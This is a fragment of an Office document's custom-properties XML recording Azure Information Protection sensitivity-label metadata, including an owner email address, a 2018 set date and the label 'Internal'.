  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_2fef85ea-3e38-424b-a536-85f7ca35fb6d_Owner">
    <vt:lpwstr>oleksandr.kazymyrov@evry.com</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_2fef85ea-3e38-424b-a536-85f7ca35fb6d_SetDate">
    <vt:lpwstr>2018-07-02T06:12:08.4284015Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_2fef85ea-3e38-424b-a536-85f7ca35fb6d_Name">
    <vt:lpwstr>Internal</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_2fef85ea-3e38-424b-a536-85f7ca35fb6d_Application">
    <vt:lpwstr>Microsoft Azure Information Protection</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_2fef85ea-3e38-424b-a536-85f7ca35fb6d_Extended_MSFT_Method">
    <vt:lpwstr>Automatic</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="Sensitivity">
    <vt:lpwstr>Internal</vt:lpwstr>
  </property>
</Properties>
</file>